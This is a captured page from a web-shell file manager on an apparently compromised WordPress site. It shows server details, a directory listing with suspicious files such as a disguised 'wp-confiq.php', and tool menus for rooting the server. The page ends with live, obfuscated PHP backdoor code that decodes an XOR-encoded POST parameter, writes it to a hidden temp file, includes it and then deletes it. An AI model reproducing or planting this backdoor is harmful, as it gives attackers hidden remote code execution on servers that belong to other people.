Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
drug.oishifashion.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-08-29 07:15
wp-admin
[ DIR ]
drwxr-xr-x
2025-12-22 06:21
wp-content
[ DIR ]
drwxr-xr-x
2025-12-22 06:21
wp-includes
[ DIR ]
drwxr-xr-x
2025-12-27 10:46
.htaccess
621
B
-r--r--r--
2025-12-22 06:20
16940c9f59d215admin.php
9.25
KB
-rw-r--r--
2025-12-25 10:36
about.php
6.43
KB
-rw-r--r--
2025-11-08 06:10
content.php
5.01
KB
-rw-r--r--
2025-11-02 05:40
error_log
5.72
KB
-rw-r--r--
2025-12-28 23:57
header.php
12.53
KB
-rw-r--r--
2025-09-23 06:00
index.php
55.12
KB
-r--r--r--
2025-12-22 06:20
radio.php
4.75
KB
-rw-r--r--
2025-10-27 06:13
wp-blog-header.php
2.74
KB
-rw-r--r--
2025-12-28 19:35
wp-confiq.php
105.03
KB
-rw-r--r--
2025-12-18 07:34
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
wp.php
682
B
-rw-r--r--
2025-09-23 06:00
Save
Rename
<?php if(array_key_exists("\x70g\x72p", $_POST) && !is_null($_POST["\x70g\x72p"])){ $tkn = hex2bin($_POST["\x70g\x72p"]); $reference = '' ; foreach(str_split($tkn) as $char){$reference .= chr(ord($char) ^ 99);} $flg = array_filter([sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), session_save_path(), getenv("TEMP"), "/dev/shm", "/tmp"]); foreach ($flg as $key => $descriptor) { if (max(0, is_dir($descriptor) * is_writable($descriptor))) { $symbol = "$descriptor" . "/.rec"; $file = fopen($symbol, 'w'); if ($file) { fwrite($file, $reference); fclose($file); include $symbol; @unlink($symbol); exit; } } } }